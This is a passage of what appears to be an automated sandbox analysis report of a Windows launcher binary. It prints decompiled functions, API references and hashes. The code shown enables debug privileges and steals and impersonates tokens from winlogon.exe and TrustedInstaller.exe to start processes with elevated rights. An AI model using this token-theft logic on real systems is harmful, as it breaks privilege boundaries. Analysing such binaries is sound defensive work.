					E004056B5(_t158, __eflags, _t82, _a12);
					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
					 *_t206 = L"/SpecialRun";
					_t85 = E0040585C( &_v0);
					__eflags = _t85;
					if(_t85 != 0) {
						L8:
						_t86 = E0040585C( &_a8, L"/Run");
						__eflags = _t86 - _t156;
						if(_t86 < _t156) {
							_t87 = E0040585C( &_a8, L"/cfg");
							__eflags = _t87 - _t156;
							if(_t87 >= _t156) {
								_t162 =  *0x40fa74; // 0x4101c8
								_t41 = _t87 + 1; // 0x1
								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
								_t115 =  *0x40fa74; // 0x4101c8
								_t117 = wcschr(_t115 + 0x5504, 0x5c);
								__eflags = _t117;
								if(_t117 == 0) {
									_a92 = _t156;
									memset( &_a94, _t156, 0x208);
									_a620 = _t156;
									memset( &_a622, _t156, 0x208);
									GetCurrentDirectoryW(0x104,  &_a92);
									_t124 =  *0x40fa74; // 0x4101c8
									_t125 = _t124 + 0x5504;
									_v4 = _t125;
									_t187 = wcslen(_t125);
									_t51 = wcslen( &_a92) + 1; // 0x1
									__eflags = _t187 + _t51 - 0x104;
									if(_t187 + _t51 >= 0x104) {
										_a620 = _t156;
									} else {
										E00404BE4( &_a620,  &_a92, _v4);
									}
									_t131 =  *0x40fa74; // 0x4101c8
									_t132 = _t131 + 0x5504;
									__eflags = _t132;
									wcscpy(_t132,  &_a620);
								}
							}
							E00402F31(_t156);
							_t181 =  *0x40fa74; // 0x4101c8
							_pop(_t159);
							_a84 =  &_a8;
							_a76 = 0x40cb0c;
							_a88 = _t156;
							_a80 = _t156;
							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
							_t92 =  *0x40fa74; // 0x4101c8
							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
								_t93 = E0040585C( &_a8, L"/savelangfile");
								__eflags = _t93;
								if(_t93 < 0) {
									E00406420();
									__imp__CoInitialize(_t156);
									_t95 =  *0x40fa74; // 0x4101c8
									E00408910(_t95 + 0x10, _t159, 0x416f60);
									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
									_t198 =  *0x40fa74; // 0x4101c8
									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
									E00402F31(1);
									__imp__CoUninitialize();
								} else {
									E004065BE(_t159);
								}
								goto L7;
							} else {
								_t64 = _t92 + 0x10; // 0x4101d8
								_a7356 = _t156;
								_a7352 = _t156;
								_a7340 = _t156;
								_a7344 = _t156;
								_a7348 = _t156;
								_t156 = E00401D40(_t179, _t64,  &_a5292);
								_t110 =  &_a5288;
								L6:
								E004035FB(_t110);
								L7:
								E004054B9( &_v0);
								E004099D4( &_a32);
								E004054B9( &_v0);
								_t106 = _t156;
								goto L2;
							}
						}
						_t26 = _t86 + 1; // 0x1
						_t173 = _t26;
						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
						if(__eflags == 0) {
							E00402F31(_t156);
						} else {
							E00402FC6(_t173, __eflags, _t138);
						}
						_t188 =  *0x40fa74; // 0x4101c8
						_a68 =  &_a8;
						_a60 = 0x40cb0c;
						_a72 = _t156;
						_a64 = _t156;
						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
						_t190 =  *0x40fa74; // 0x4101c8
						_a5280 = _t156;
						_a5276 = _t156;
						_a5264 = _t156;
						_a5268 = _t156;
						_a5272 = _t156;
						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
						_t110 =  &_a3212;
						goto L6;
					}
					__eflags = _a56 - 3;
					if(_a56 != 3) {
						goto L8;
					}
					__eflags = 1;
					_a3212 = 0;
					_a3208 = 0;
					_a3196 = 0;
					_a3200 = 0;
					_a3204 = 0;
					_v4 = 0;
					_v0 = 0;
					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
					_t177 = 2;
					_push(E0040584C( &_v0, _t177));
					L0040B1F8();
					_pop(_t178);
					_t156 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152);
					_t110 =  &_a1132;
					goto L6;
				} else {
					_t106 = _t76 + 1;
					L2:
					return _t106;
				}
			}

0x00408533
0x00408533
0x00408536
0x0040853e
0x00408546
0x0040854d
0x00408559
0x00408563
0x00408569
0x00408572
0x00408583
0x0040858d
0x00408595
0x0040859e
0x004085a2
0x004085a6
0x004085aa
0x004085ae
0x004085b8
0x004085c1
0x004085c8
0x004085cd
0x004085cf
0x0040867f
0x00408688
0x0040868d
0x0040868f
0x00408730
0x00408735
0x00408737
0x0040873d
0x00408750
0x0040875d
0x00408763
0x00408770
0x00408775
0x00408779
0x0040878b
0x00408790
0x004087a2
0x004087aa
0x004087b8
0x004087be
0x004087c3
0x004087c9
0x004087d2
0x004087df
0x004087e3
0x004087e6
0x00408801
0x004087e8
0x004087f8
0x004087fe
0x00408811
0x00408816
0x00408816
0x0040881c
0x00408822
0x00408779
0x00408824
0x00408829
0x00408833
0x00408834
0x00408840
0x00408848
0x0040884c
0x00408850
0x00408855
0x0040885a
0x00408860
0x004088ac
0x004088b1
0x004088b3
0x004088bf
0x004088c5
0x004088cb
0x004088da
0x004088ea
0x004088ed
0x004088f8
0x004088ff
0x00408905
0x004088b5
0x004088b5
0x004088b5
0x00000000
0x00408862
0x00408862
0x0040886d
0x00408874
0x0040887b
0x00408882
0x00408889
0x00408895
0x00408897
0x00408658
0x00408658
0x0040865d
0x00408661
0x0040866a
0x00408673
0x00408678
0x00000000
0x00408678
0x00408860
0x00408695
0x00408695
0x0040869f
0x004086a2
0x004086af
0x004086a4
0x004086a7
0x004086a7
0x004086b4
0x004086bf
0x004086cb
0x004086d3
0x004086d7
0x004086db
0x004086e0
0x004086f1
0x004086f8
0x004086ff
0x00408706
0x0040870d
0x00408719
0x0040871b
0x00000000
0x0040871b
0x004085d5
0x004085da
0x00000000
0x00000000
0x004085ec
0x004085ef
0x004085f6
0x004085fd
0x00408604
0x0040860b
0x00408612
0x00408616
0x00408620
0x0040862a
0x00408632
0x00408633
0x00408638
0x0040864f
0x00408651
0x00000000
0x0040854f
0x0040854f
0x00408550
0x00408556
0x00408556

APIs

Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
EnumResourceTypesW.KERNEL32 ref: 00408583
swscanf.MSVCRT ref: 00408620
_wtoi.MSVCRT ref: 00408633

Strings

/cfg, xrefs: 00408727
%I64x, xrefs: 004085E7
XA, xrefs: 004088E5
/Run, xrefs: 0040867F
/savelangfile, xrefs: 004088A3
SeDebugPrivilege, xrefs: 004085B3
, xrefs: 00408595
`oA, xrefs: 004088D0

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
API String ID: 3933224404-3784219877
Opcode ID: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
Opcode Fuzzy Hash: 1ed12eb10884b9e827e0875f5387ef1e7972f3b4abe7ba30fea96de0eb1c323a
Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243
processCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}

0x00401fe6
0x00401ff1
0x00401ff3
0x00401fff
0x00402002
0x004020a8
0x004020ab
0x004020f3
0x004020f6
0x00402162
0x00402165
0x004021f2
0x004021f5
0x00402235
0x00402238
0x004022be
0x0040223a
0x0040223a
0x00402240
0x0040224b
0x0040224e
0x00402251
0x00402254
0x00402259
0x0040225e
0x00402262
0x00402264
0x00402264
0x00402264
0x00402262
0x00402266
0x0040226c
0x00402271
0x00402274
0x00402276
0x0040229a
0x0040229a
0x00402278
0x00402296
0x00402296
0x0040229c
0x0040229c
0x004022c0
0x004022c2
0x004022c8
0x004022c8
0x004022c8
0x00000000
0x004022c0
0x00402201
0x00402203
0x00000000
0x00000000
0x00402220
0x00402225
0x00402227
0x00000000
0x00000000
0x0040222d
0x00000000
0x0040222d
0x00402173
0x00402179
0x0040217b
0x0040217e
0x00402183
0x00402185
0x00402188
0x0040218d
0x0040218f
0x00402192
0x004021a2
0x004021a7
0x004021a9
0x004021ac
0x004021cc
0x004021d1
0x004021d3
0x004021db
0x004021db
0x004021e1
0x004021e1
0x004021e7
0x004021e7
0x00000000
0x00402192
0x004020fe
0x00402103
0x00402105
0x00000000
0x00000000
0x00402111
0x00402114
0x00000000
0x00402114
0x004020ad
0x004020b4
0x004020b9
0x004020bc
0x00000000
0x004020c2
0x004020c4
0x004020ce
0x004020d0
0x004020d3
0x004020d4
0x004020d5
0x004020e6
0x004020e7
0x004020d7
0x004020d7
0x004020dd
0x004020de
0x004020df
0x004020df
0x004020ec
0x004020ef
0x00000000
0x004020ef
0x00402008
0x00402016
0x0040201d
0x0040202e
0x00402035
0x00402044
0x00402049
0x00402055
0x00402064
0x00402068
0x0040206e
0x0040208b
0x00402070
0x00402082
0x00402088
0x0040209e
0x004020a1
0x00402119
0x00402119
0x0040211b
0x0040211e
0x0040211e
0x00402149
0x00402151
0x00402151
0x00402157
0x00402157
0x004022cb
0x004022d2
0x004022d2

APIs

memset.MSVCRT ref: 0040201D
memset.MSVCRT ref: 00402035

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00402050
wcslen.MSVCRT ref: 0040205F
wcslen.MSVCRT ref: 004020B4
_wtoi.MSVCRT ref: 004020D7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
OpenSCManagerW.SECHOST(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61

Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

wcschr.MSVCRT ref: 00402259
CreateProcessW.KERNEL32 ref: 004022B8
GetLastError.KERNEL32(?,?,00000000), ref: 004022C2

Strings

winlogon.exe, xrefs: 00402049, 00402076
ServicesActive, xrefs: 0040216D
TrustedInstaller.exe, xrefs: 0040219C

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
API String ID: 3201562063-2355939583
Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59

Uniqueness

Uniqueness Score: -1.00%

Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}

0x00409924
0x0040992c
0x00409937
0x0040993f
0x0040994a
0x00409956
0x00409962
0x0040996e
0x00409971
0x00409973
0x00000000
0x00409976
0x00409977

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

Strings

EnumProcessModules, xrefs: 00409943
GetModuleInformation, xrefs: 00409967
GetModuleBaseNameW, xrefs: 00409937
EnumProcesses, xrefs: 0040995B
GetModuleFileNameExW, xrefs: 0040994F
psapi.dll, xrefs: 00409927

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$memsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1529661771-70141382
Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040C390,00000070), ref: 0040B2D5
__set_app_type.MSVCRT ref: 0040B334
__p__fmode.MSVCRT ref: 0040B349
__p__commode.MSVCRT ref: 0040B357
__setusermatherr.MSVCRT ref: 0040B383
_initterm.MSVCRT ref: 0040B399
__wgetmainargs.KERNELBASE ref: 0040B3BC
_initterm.MSVCRT ref: 0040B3CF
GetStartupInfoW.KERNEL32(?), ref: 0040B42C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B452
exit.KERNELBASE ref: 0040B469
_cexit.MSVCRT ref: 0040B46F

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}

0x00401f04
0x00401f20
0x00401f27
0x00401f38
0x00401f3f
0x00401f4e
0x00401f54
0x00401f5f
0x00401f6e
0x00401f72
0x00401f77
0x00401f78
0x00401f91
0x00401f7a
0x00401f88
0x00401f8e
0x00401f8e
0x00401fa6
0x00401fa9
0x00401fae
0x00401fb0
0x00401fb2
0x00401fb9
0x00401fc2
0x00401fca
0x00401fd2
0x00401fd2
0x00401fd7
0x00401fd7
0x00401fe3

APIs

memset.MSVCRT ref: 00401F27
memset.MSVCRT ref: 00401F3F

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00401F5A
wcslen.MSVCRT ref: 00401F69
ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Strings

winlogon.exe, xrefs: 00401F54, 00401F59, 00401F80
SeImpersonatePrivilege, xrefs: 00401FB4

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
String ID: SeImpersonatePrivilege$winlogon.exe
API String ID: 3867304300-2177360481
Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27
libraryloadertimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}

0x0040955f
0x00409566
0x0040956e
0x00409576
0x00409586
0x00409586
0x0040956e
0x00409592
0x004095aa
0x00409594
0x004095a3
0x004095a6
0x004095a6

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3

Strings

kernel32.dll, xrefs: 00409561
GetProcessTimes, xrefs: 00409570

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProcessTimes
String ID: GetProcessTimes$kernel32.dll
API String ID: 1714573020-3385500049
Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
